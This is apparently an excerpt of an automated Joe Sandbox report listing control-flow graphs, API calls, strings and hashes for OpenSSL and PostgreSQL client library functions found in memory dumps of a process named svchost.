                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 811 7ffda33819b0-7ffda3381a65 call 7ffda33aedf0 814 7ffda3381a6e 811->814 815 7ffda3381a67-7ffda3381a6c call 7ffda333f090 811->815 816 7ffda3381a73-7ffda3381a79 814->816 815->816 818 7ffda3381a81-7ffda3381a85 816->818 819 7ffda3381a7b-7ffda3381a7f 816->819 821 7ffda3381a89-7ffda3381a93 818->821 819->821 822 7ffda3381abb-7ffda3381abe 821->822 823 7ffda3381a95-7ffda3381a98 821->823 826 7ffda3381ac0 822->826 827 7ffda3381ae7-7ffda3381af4 822->827 824 7ffda3381ac2-7ffda3381ac5 823->824 825 7ffda3381a9a-7ffda3381ab7 823->825 828 7ffda3381ae0 824->828 829 7ffda3381ac7 824->829 825->822 830 7ffda3381ace-7ffda3381ade 826->830 831 7ffda3381af9-7ffda3381b0a 827->831 828->827 829->830 830->831 832 7ffda3381b0c-7ffda3381b12 831->832 833 7ffda3381b47-7ffda3381bb4 OSSL_PARAM_construct_uint64 call 7ffda33ae638 831->833 832->833 835 7ffda3381b14-7ffda3381b42 ERR_new ERR_set_debug ERR_set_error 832->835 838 7ffda3381c2d-7ffda3381c61 call 7ffda33aebd8 833->838 839 7ffda3381bb6-7ffda3381c2b OSSL_PARAM_construct_uint64 OSSL_PARAM_construct_int 833->839 836 7ffda3382254 835->836 840 7ffda3382256-7ffda3382278 call 7ffda33aee50 836->840 842 7ffda3381c69-7ffda3381c99 OSSL_PARAM_construct_end 838->842 839->842 846 7ffda3381c9b-7ffda3381ca7 842->846 847 7ffda3381cb5-7ffda3381cc1 842->847 848 7ffda3381cb0-7ffda3381cb3 846->848 849 7ffda3381ca9 846->849 850 7ffda3381cc3 847->850 851 7ffda3381cca 847->851 852 7ffda3381ccd 848->852 849->848 850->851 851->852 853 7ffda3381ccf 852->853 854 7ffda3381cd6-7ffda3381cd8 852->854 853->854 855 7ffda3381cda-7ffda3381d0f OSSL_PARAM_construct_int 854->855 856 7ffda3381d17-7ffda3381d1b 854->856 855->856 857 7ffda3381d4d-7ffda3381d51 856->857 858 7ffda3381d1d-7ffda3381d49 OSSL_PARAM_construct_int 856->858 859 7ffda3381d83-7ffda3381d86 857->859 860 7ffda3381d53-7ffda3381d7f OSSL_PARAM_construct_int 857->860 858->857 861 7ffda3381db0 859->861 862 7ffda3381d88-7ffda3381d92 859->862 860->859 864 7ffda3381db3-7ffda3381db8 861->864 862->861 863 7ffda3381d94-7ffda3381da0 862->863 863->861 865 7ffda3381da2-7ffda3381dae 863->865 866 7ffda3381dea-7ffda3381dee 864->866 867 7ffda3381dba-7ffda3381de6 OSSL_PARAM_construct_uint32 864->867 865->864 868 7ffda3381e04-7ffda3381e08 866->868 869 7ffda3381df0-7ffda3381df3 866->869 867->866 870 7ffda3381e0a-7ffda3381e10 868->870 871 7ffda3381e56-7ffda3381e77 OSSL_PARAM_construct_end 868->871 869->871 872 7ffda3381df5-7ffda3381dfc 869->872 874 7ffda3381e13-7ffda3381e15 870->874 875 7ffda3381e80-7ffda3381e98 871->875 872->871 873 7ffda3381dfe-7ffda3381e02 872->873 873->874 874->871 876 7ffda3381e17-7ffda3381e24 call 7ffda3380260 874->876 877 7ffda3381e9a-7ffda3381ea5 875->877 878 7ffda3381ef6-7ffda3381efa 875->878 876->871 893 7ffda3381e26-7ffda3381e52 OSSL_PARAM_construct_uint32 876->893 882 7ffda3381ebc-7ffda3381ecb 877->882 883 7ffda3381ea7-7ffda3381eac 877->883 880 7ffda3381f13-7ffda3381f2b 878->880 881 7ffda3381efc-7ffda3381eff 878->881 888 7ffda3381f3d-7ffda3381f5a 880->888 889 7ffda3381f2d-7ffda3381f39 880->889 881->880 886 7ffda3381f01-7ffda3381f0e call 7ffda337f0a0 881->886 884 7ffda3381ed4 call 7ffda33ae206 882->884 885 7ffda3381ecd-7ffda3381ed2 BIO_s_dgram_mem 882->885 883->882 890 7ffda3381eae-7ffda3381eb9 call 7ffda337f0a0 883->890 891 7ffda3381ed9-7ffda3381ee7 BIO_new 884->891 885->891 903 7ffda3381f11 886->903 896 7ffda3381f71-7ffda33820b8 call 7ffda33872f1 888->896 897 7ffda3381f5c-7ffda3381f6c 888->897 889->888 890->882 898 7ffda3381eed-7ffda3381ef4 891->898 899 7ffda33820ec-7ffda33820f1 ERR_new 891->899 893->871 902 7ffda33820bb-7ffda33820c8 BIO_free 896->902 897->896 898->903 904 7ffda33820f6-7ffda338210f ERR_set_debug 899->904 905 7ffda3382222-7ffda338223f ERR_new ERR_set_debug 902->905 906 7ffda33820ce-7ffda33820d1 902->906 903->880 907 7ffda3382245-7ffda338224f call 7ffda3397c10 904->907 905->907 908 7ffda33820d3-7ffda33820dd 906->908 909 7ffda338213c-7ffda338213f 906->909 907->836 911 7ffda3382114-7ffda3382137 ERR_new ERR_set_debug 908->911 912 7ffda33820df-7ffda33820e2 908->912 913 7ffda3382141-7ffda338214b ERR_new 909->913 914 7ffda338214d-7ffda338215c 909->914 911->907 912->911 915 7ffda33820e4-7ffda33820e7 912->915 913->904 916 7ffda338215e-7ffda3382161 914->916 917 7ffda338217b-7ffda3382189 914->917 915->875 916->917 920 7ffda3382163-7ffda3382179 call 7ffda3325f40 916->920 918 7ffda338218b-7ffda3382193 917->918 919 7ffda33821a8-7ffda33821b9 917->919 918->919 928 7ffda3382195-7ffda338219f ERR_new 918->928 921 7ffda33821cb-7ffda33821d2 919->921 922 7ffda33821bb-7ffda33821c9 919->922 920->917 927 7ffda33821a4 920->927 925 7ffda33821d9-7ffda33821e1 921->925 922->925 929 7ffda33821e3-7ffda33821eb 925->929 930 7ffda33821ed-7ffda33821f4 925->930 927->919 928->904 929->930 931 7ffda3382200-7ffda338220a 929->931 930->931 932 7ffda33821f6-7ffda33821fb 930->932 933 7ffda338220c-7ffda3382213 931->933 934 7ffda338221b-7ffda3382220 931->934 932->931 933->934 935 7ffda3382215 933->935 934->840 935->934
                          APIs
                          • ERR_new.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381B14
                          • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381B2C
                          • ERR_set_error.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381B3D
                          • OSSL_PARAM_construct_uint64.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381B59
                          • OSSL_PARAM_construct_uint64.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381BC4
                          • OSSL_PARAM_construct_int.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381BFD
                          • OSSL_PARAM_construct_end.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381C6D
                          • OSSL_PARAM_construct_int.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381CE9
                          • OSSL_PARAM_construct_int.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381D2C
                          • OSSL_PARAM_construct_int.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381D62
                          • OSSL_PARAM_construct_uint32.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381DC9
                          • OSSL_PARAM_construct_uint32.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381E35
                          • OSSL_PARAM_construct_end.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381E5A
                          • BIO_s_dgram_mem.LIBCRYPTO-3-X64 ref: 00007FFDA3381ECD
                          • BIO_new.LIBCRYPTO-3-X64 ref: 00007FFDA3381EDC
                          • BIO_free.LIBCRYPTO-3-X64 ref: 00007FFDA33820C0
                          • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA33820EC
                          • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFDA3382104
                          • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA3382114
                          • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFDA338212C
                          • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA3382141
                          • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA3382195
                          • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA3382222
                          • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFDA338223A
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: R_new$M_construct_intR_set_debug$M_construct_endM_construct_uint32M_construct_uint64$O_freeO_newO_s_dgram_memR_set_error
                          • String ID: block_padding$max_early_data$max_frag_len$mode$options$read_ahead$read_buffer_len$ssl\record\rec_layer_s3.c$ssl_set_new_record_layer$stream_mac$tlstree$use_etm
                          • API String ID: 3782620925-1760797909
                          • Opcode ID: 26df34efff16ab7e7fd55ff4b810bd16375307e5f442621eda72973cbc762beb
                          • Instruction ID: 1a7ec0a3ff59d5ab2b9725584d70bcbf19e0cee66fc7f441b3024ad992553638
                          • Opcode Fuzzy Hash: 26df34efff16ab7e7fd55ff4b810bd16375307e5f442621eda72973cbc762beb
                          • Instruction Fuzzy Hash: 4E424B22E0DF8686E761AF68D8503E933A2FB58748F048235DE4D67756DF39E185C304
                          Function 00007FFDA3773BC7 Relevance: 58.1, APIs: 22, Strings: 11, Instructions: 306networkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 937 7ffda3773bc7-7ffda3773bd4 938 7ffda3773be5-7ffda3773c66 937->938 939 7ffda3773bd6-7ffda3773bdb 937->939 940 7ffda3773c68-7ffda3773c6e free 938->940 941 7ffda3773c75-7ffda3773c80 938->941 939->938 940->941 942 7ffda3773c94-7ffda3773c98 941->942 943 7ffda3773c82-7ffda3773c92 941->943 945 7ffda3773ce3 942->945 946 7ffda3773c9a-7ffda3773ca6 942->946 944 7ffda3773caa-7ffda3773cc2 call 7ffda3794cf0 943->944 944->945 955 7ffda3773cc4-7ffda3773ccb 944->955 947 7ffda3773cea-7ffda3773d04 socket 945->947 946->944 949 7ffda3773d6b-7ffda3773d75 call 7ffda37790d0 947->949 950 7ffda3773d06-7ffda3773d1a WSAGetLastError 947->950 957 7ffda3773d7a-7ffda3773d7d 949->957 952 7ffda3773d20-7ffda3773d2e 950->952 953 7ffda3773e0a-7ffda3773e14 950->953 952->953 956 7ffda3773d34-7ffda3773d66 call 7ffda37790d0 call 7ffda378c450 call 7ffda3782d70 952->956 960 7ffda3773e20-7ffda3773e23 953->960 955->947 958 7ffda3773ccd-7ffda3773ce1 _strdup 955->958 986 7ffda3774dae-7ffda3774db8 956->986 961 7ffda3773dd1-7ffda3773ddf call 7ffda3793980 957->961 962 7ffda3773d7f-7ffda3773dac setsockopt 957->962 958->947 965 7ffda377404b-7ffda377406e connect 960->965 966 7ffda3773e29-7ffda3773e30 960->966 961->960 976 7ffda3773de1-7ffda3773df8 WSAGetLastError call 7ffda378c450 961->976 962->961 967 7ffda3773dae-7ffda3773dcf WSAGetLastError call 7ffda378c450 962->967 971 7ffda3774070-7ffda377407b WSAGetLastError 965->971 972 7ffda37740c9-7ffda37740d3 965->972 973 7ffda3773e32-7ffda3773e4b strtol 966->973 974 7ffda3773e7a-7ffda3773e92 966->974 985 7ffda3773dff-7ffda3773e05 call 7ffda3782d70 967->985 980 7ffda3774081-7ffda377408c WSAGetLastError 971->980 981 7ffda37748c9-7ffda37748d8 971->981 972->981 982 7ffda3773e72-7ffda3773e74 973->982 983 7ffda3773e4d-7ffda3773e66 call 7ffda3782d70 973->983 977 7ffda3773e94-7ffda3773eba _errno strtol 974->977 978 7ffda3773f05-7ffda3773f0f 974->978 976->985 989 7ffda3773ec0-7ffda3773ec9 _errno 977->989 990 7ffda3773f8d-7ffda3773fa6 call 7ffda3782d70 977->990 993 7ffda3773f11-7ffda3773f27 call 7ffda377a920 978->993 994 7ffda3773f2e-7ffda3773f42 call 7ffda377afa0 978->994 980->981 992 7ffda3774092-7ffda377409d WSAGetLastError 980->992 981->986 987 7ffda3774dba-7ffda3774e02 call 7ffda3796230 981->987 982->965 982->974 983->982 985->953 986->987 989->990 999 7ffda3773ecf-7ffda3773ed9 989->999 1015 7ffda3773f6b-7ffda3773f78 990->1015 992->981 1004 7ffda37740a3-7ffda37740bd WSAGetLastError call 7ffda3776990 992->1004 993->1015 1017 7ffda3773f29 993->1017 1012 7ffda3773f44-7ffda3773f66 WSAGetLastError call 7ffda3782d70 994->1012 1013 7ffda3773fa8-7ffda3773faf 994->1013 999->978 1007 7ffda3773edb 999->1007 1004->972 1014 7ffda3773ee0-7ffda3773ef0 isspace 1007->1014 1012->1015 1021 7ffda3774048 1013->1021 1022 7ffda3773fb5-7ffda3773fd8 _errno strtol 1013->1022 1019 7ffda3773f84-7ffda3773f87 1014->1019 1020 7ffda3773ef6-7ffda3773f03 1014->1020 1015->1019 1017->994 1019->978 1019->990 1020->978 1020->1014 1021->965 1023 7ffda3774019-7ffda377403c call 7ffda3782d70 1022->1023 1024 7ffda3773fda-7ffda3773fe3 _errno 1022->1024 1023->1021 1024->1023 1026 7ffda3773fe5-7ffda3773fef 1024->1026 1026->965 1028 7ffda3773ff1-7ffda3774001 isspace 1026->1028 1029 7ffda3774003-7ffda3774010 1028->1029 1030 7ffda3774014-7ffda3774017 1028->1030 1029->1028 1031 7ffda3774012 1029->1031 1030->965 1030->1023 1031->965
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast_strdupfreesocket
                          • String ID: %s(%s) failed: error code %d$SIO_KEEPALIVE_VALS$WSAIoctl$could not create socket: %s$could not set socket to TCP no delay mode: %s$could not set socket to nonblocking mode: %s$invalid integer value "%s" for connection option "%s"$keepalives parameter must be an integer$keepalives_idle$keepalives_interval$tcp_user_timeout
                          • API String ID: 3112834638-675630034
                          • Opcode ID: 8cd08dfe8031b0aaf4a845d97061ffdad2b2a9228fa88f5f927dcb7eefd18dce
                          • Instruction ID: 10d9b88d13d07858b09010664e8736444a4aa6b3ae2df3a926f3c76696f85c3f
                          • Opcode Fuzzy Hash: 8cd08dfe8031b0aaf4a845d97061ffdad2b2a9228fa88f5f927dcb7eefd18dce
                          • Instruction Fuzzy Hash: 0CF1C222B0EA8282F7908F25D4602BC37A2FB45B84F445231EE4E67396DF7EE585C754
                          Function 682814A0 Relevance: 51.1, APIs: 27, Strings: 2, Instructions: 312stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1186 682814a0-682814c5 1187 682814e2-682814f2 strcmp 1186->1187 1188 682814c7 1186->1188 1190 682814d0 1187->1190 1191 682814f4-682814f7 1187->1191 1189 682815e4-682815e7 1188->1189 1195 68281709-6828170c 1189->1195 1196 682815ed-682815f2 1189->1196 1190->1189 1192 682814d6-682814dc 1190->1192 1193 682814fd-68281504 1191->1193 1194 682816d4-682816d7 1191->1194 1192->1187 1192->1189 1201 6828150a-6828151b strcmp 1193->1201 1202 682816f7-68281702 1193->1202 1197 682815c0-682815cf pthread_rwlock_unlock 1194->1197 1203 682816dd-682816e4 1194->1203 1195->1197 1198 68281712-68281717 1195->1198 1199 682815f8-68281613 strlen malloc 1196->1199 1200 68281782-68281785 1196->1200 1206 68281822-68281840 abort 1197->1206 1207 682815d5-682815e3 1197->1207 1204 68281719-68281734 strlen malloc 1198->1204 1205 68281797-6828179a 1198->1205 1211 682817e8 1199->1211 1212 68281619-68281623 memcpy 1199->1212 1200->1198 1208 68281787-68281792 1200->1208 1209 682816d0 1201->1209 1210 68281521-68281532 strcmp 1201->1210 1202->1203 1215 68281704 1202->1215 1213 682816ea-682816f2 1203->1213 1214 6828156e-68281575 1203->1214 1216 6828173a-6828174c memcpy 1204->1216 1217 6828181b-6828181e 1204->1217 1219 6828179c-682817a3 1205->1219 1220 682817a7-682817af 1205->1220 1224 68281849-68281851 1206->1224 1225 68281842-68281845 1206->1225 1208->1197 1209->1194 1222 68281538-68281545 1210->1222 1223 68281762-68281770 _strdup 1210->1223 1218 682817f0-682817f3 1211->1218 1221 68281628-68281636 1212->1221 1228 682815b2-682815b4 1213->1228 1226 68281586-68281594 _strdup 1214->1226 1227 68281577-68281584 strcmp 1214->1227 1215->1197 1216->1221 1232 68281752-6828175d 1216->1232 1217->1211 1239 68281820 1217->1239 1218->1220 1238 682817f5 1218->1238 1219->1220 1220->1197 1236 68281638-68281649 strcmp 1221->1236 1237 6828164f-6828165a 1221->1237 1240 6828154f-6828155a 1222->1240 1241 68281547-6828154a free 1222->1241 1234 682816ca-682816cd 1223->1234 1235 68281776 1223->1235 1242 68281852-68281861 pthread_rwlock_wrlock 1225->1242 1243 68281847 1225->1243 1229 6828159a-682815aa free 1226->1229 1230 682817c0 1226->1230 1227->1226 1231 682815ae 1227->1231 1228->1197 1233 682815b6-682815bd 1228->1233 1229->1231 1247 682817c7-682817d5 _strdup 1230->1247 1231->1228 1246 68281660-68281667 1232->1246 1233->1197 1234->1209 1235->1200 1236->1237 1236->1247 1237->1246 1248 682817fa 1237->1248 1238->1197 1239->1220 1240->1233 1249 6828155c-68281568 1240->1249 1241->1240 1244 68281881-682818a0 abort 1242->1244 1245 68281863-6828186e call 682814a0 1242->1245 1243->1224 1251 682818a9-682818b1 1244->1251 1252 682818a2-682818a5 1244->1252 1256 68281873-68281880 1245->1256 1253 68281669-68281671 _strdup 1246->1253 1254 6828167a-68281689 1246->1254 1247->1237 1255 682817db-682817e6 free 1247->1255 1259 68281807-68281812 1248->1259 1249->1213 1249->1214 1257 682818b2-682818c1 pthread_rwlock_wrlock 1252->1257 1258 682818a7 1252->1258 1253->1259 1260 68281677 1253->1260 1261 6828168f-6828169d strcmp 1254->1261 1262 682817b4-682817b7 1254->1262 1255->1211 1255->1218 1263 682818e0-68281910 abort call 682849a0 1257->1263 1264 682818c3-682818df call 682814a0 1257->1264 1258->1251 1259->1255 1267 68281814-68281819 free 1259->1267 1260->1254 1265 6828169f 1261->1265 1266 682816b7-682816bd 1261->1266 1262->1230 1265->1262 1270 682816bf-682816c2 1266->1270 1271 682816a4-682816b2 strcmp 1266->1271 1267->1255 1270->1234 1271->1270 1273 682816b4 1271->1273 1273->1266
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3360027676.0000000068281000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68280000, based on PE: true
                          • Associated: 00000035.00000002.3360005479.0000000068280000.00000002.00000001.01000000.0000000F.sdmpDownload File
                          • Associated: 00000035.00000002.3360061025.0000000068296000.00000004.00000001.01000000.0000000F.sdmpDownload File
                          • Associated: 00000035.00000002.3360094548.0000000068297000.00000002.00000001.01000000.0000000F.sdmpDownload File
                          • Associated: 00000035.00000002.3360130835.00000000682A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                          • Associated: 00000035.00000002.3360164781.00000000682A1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                          • Associated: 00000035.00000002.3360185514.00000000682A4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                          • Associated: 00000035.00000002.3360206133.00000000682A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                          • Associated: 00000035.00000002.3360206133.00000000682EC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_68280000_svchost.jbxd
                          Similarity
                          • API ID: strcmp$_strdupfree$abortmallocmemcpystrlen$pthread_rwlock_unlockpthread_rwlock_wrlock
                          • String ID: 8`)h$pq)h
                          • API String ID: 1031399696-283867673
                          • Opcode ID: cb983b356597ae51a9f56790f2f6bd878aa87684a455ba1a6645e18326cee76a
                          • Instruction ID: 5793e577236a2a3729ad3064a16418873e0c77d2e3cfaac9fddc10f9c11526e5
                          • Opcode Fuzzy Hash: cb983b356597ae51a9f56790f2f6bd878aa87684a455ba1a6645e18326cee76a
                          • Instruction Fuzzy Hash: 79A1CEA670579E85EF199F17A90476923A5BB45BC9FC88029DE7A477C0EF38C0D8C300
                          Function 00007FFDA3773552 Relevance: 38.9, APIs: 8, Strings: 14, Instructions: 397stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1607 7ffda3773552-7ffda377355c call 7ffda3782370 1610 7ffda3773562 1607->1610 1611 7ffda3774dae-7ffda3774db8 1607->1611 1612 7ffda3774ccd-7ffda3774cd2 1610->1612 1613 7ffda3773568-7ffda3773575 1610->1613 1615 7ffda3774dba-7ffda3774e02 call 7ffda3796230 1611->1615 1612->1615 1616 7ffda377357a-7ffda377359d 1613->1616 1621 7ffda377359f-7ffda37735ab 1616->1621 1622 7ffda37735cc-7ffda37735d1 1616->1622 1623 7ffda37735bf-7ffda37735c2 1621->1623 1624 7ffda37735ad-7ffda37735bd 1621->1624 1625 7ffda3773b13-7ffda3773b16 1622->1625 1626 7ffda37735d7-7ffda37735e7 1622->1626 1627 7ffda37735c5 1623->1627 1624->1627 1630 7ffda3773b52-7ffda3773b55 1625->1630 1631 7ffda3773b18-7ffda3773b50 1625->1631 1628 7ffda377360b-7ffda377361b 1626->1628 1629 7ffda37735e9-7ffda37735f0 1626->1629 1627->1622 1634 7ffda377361d-7ffda3773623 free 1628->1634 1635 7ffda377362a-7ffda3773646 1628->1635 1629->1611 1632 7ffda37735f6-7ffda37735f8 1629->1632 1633 7ffda3773b57-7ffda3773b97 call 7ffda37763c0 call 7ffda377ae50 call 7ffda377e5f0 1630->1633 1636 7ffda3773b9e-7ffda3773bac 1630->1636 1631->1633 1632->1611 1642 7ffda37735fe-7ffda3773608 1632->1642 1633->1636 1634->1635 1638 7ffda3773673-7ffda377367e 1635->1638 1639 7ffda3773648-7ffda3773660 1635->1639 1640 7ffda3773bb2-7ffda3773bc2 1636->1640 1641 7ffda3774d8e-7ffda3774d9d call 7ffda3782d70 1636->1641 1644 7ffda3773682-7ffda3773694 1638->1644 1639->1644 1645 7ffda3773662-7ffda3773671 memset 1639->1645 1651 7ffda377488a-7ffda37748a3 call 7ffda3782d70 1640->1651 1641->1611 1642->1628 1649 7ffda3773749 1644->1649 1650 7ffda377369a-7ffda377369d 1644->1650 1645->1644 1653 7ffda377374f-7ffda377376e call 7ffda3791830 1649->1653 1650->1649 1654 7ffda37736a3-7ffda37736c8 _errno strtol 1650->1654 1651->1611 1663 7ffda3773774-7ffda3773777 1653->1663 1664 7ffda37738b6-7ffda37738d1 call 7ffda378e100 1653->1664 1654->1651 1658 7ffda37736ce-7ffda37736d7 _errno 1654->1658 1658->1651 1662 7ffda37736dd-7ffda37736e7 1658->1662 1665 7ffda377371c-7ffda3773725 1662->1665 1666 7ffda37736e9 1662->1666 1668 7ffda377377d-7ffda3773780 1663->1668 1669 7ffda377385c-7ffda377387e call 7ffda378e100 1663->1669 1680 7ffda3773ae7-7ffda3773b0e call 7ffda37948a0 call 7ffda3782d70 1664->1680 1681 7ffda37738d7-7ffda37738df 1664->1681 1665->1653 1671 7ffda3773727-7ffda3773744 call 7ffda3782d70 1665->1671 1670 7ffda37736f0-7ffda3773700 isspace 1666->1670 1674 7ffda3773852-7ffda3773857 1668->1674 1675 7ffda3773786-7ffda37737b8 call 7ffda3791830 1668->1675 1690 7ffda3773880-7ffda3773888 1669->1690 1691 7ffda377388a-7ffda37738b1 call 7ffda37948a0 call 7ffda3782d70 1669->1691 1677 7ffda3773713-7ffda3773716 1670->1677 1678 7ffda3773702-7ffda377370f 1670->1678 1671->1616 1683 7ffda37738e5-7ffda37738f6 1674->1683 1696 7ffda37737c0-7ffda37737c7 1675->1696 1677->1651 1677->1665 1678->1670 1685 7ffda3773711 1678->1685 1680->1616 1681->1680 1681->1683 1687 7ffda3773911-7ffda3773929 calloc 1683->1687 1688 7ffda37738f8-7ffda37738fb 1683->1688 1685->1665 1694 7ffda377392f-7ffda3773939 1687->1694 1695 7ffda37748a8-7ffda37748c4 call 7ffda3782d70 call 7ffda378e290 1687->1695 1693 7ffda3773900-7ffda377390f 1688->1693 1690->1683 1690->1691 1691->1616 1693->1687 1693->1693 1700 7ffda377393b-7ffda377393e 1694->1700 1701 7ffda3773998-7ffda37739ac call 7ffda378e290 1694->1701 1695->1611 1696->1696 1702 7ffda37737c9-7ffda37737cd 1696->1702 1706 7ffda3773940-7ffda3773996 memcpy 1700->1706 1717 7ffda3773ad2-7ffda3773ae5 1701->1717 1718 7ffda37739b2-7ffda37739bd 1701->1718 1707 7ffda37737cf-7ffda37737f5 call 7ffda3782d70 1702->1707 1708 7ffda37737fa-7ffda3773813 call 7ffda378e100 1702->1708 1706->1701 1706->1706 1707->1616 1722 7ffda3773823-7ffda377384d call 7ffda37948a0 call 7ffda3782d70 1708->1722 1723 7ffda3773815-7ffda377381d 1708->1723 1717->1631 1718->1717 1721 7ffda37739c3-7ffda37739c8 1718->1721 1724 7ffda37739d0-7ffda3773acc call 7ffda378ea30 1721->1724 1722->1616 1723->1683 1723->1722 1724->1717
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: _errno$callocfreeisspacelibintl_dgettextmemcpymemsetstrtol
                          • String ID: %s/.s.PGSQL.%d$28P01$57P03$Unix-domain socket path "%s" is too long (maximum %d bytes)$could not parse network address "%s": %s$could not translate Unix-domain socket path "%s" to address: %s$could not translate host name "%s" to address: %s$invalid connection state %d, probably indicative of memory corruption$invalid integer value "%s" for connection option "%s"$invalid port number: "%s"$out of memory$port$server is not in hot standby mode$session is not read-only
                          • API String ID: 3976168012-2457897468
                          • Opcode ID: c93c3c927744f5f9d2a6a3cae3ab13af74bb0be487adeff1de5b1b43d936940d
                          • Instruction ID: 00dce510da0ec8c968f2f3f0f699c6cb4b14ace7bc6beb741b0ecbd25062646e
                          • Opcode Fuzzy Hash: c93c3c927744f5f9d2a6a3cae3ab13af74bb0be487adeff1de5b1b43d936940d
                          • Instruction Fuzzy Hash: D512CD22B0AA8686E7518F25D4603FC3762FB58B88F445231EE4E37396DF7AE185C744
                          Function 00007FFDA3397970 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 274COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
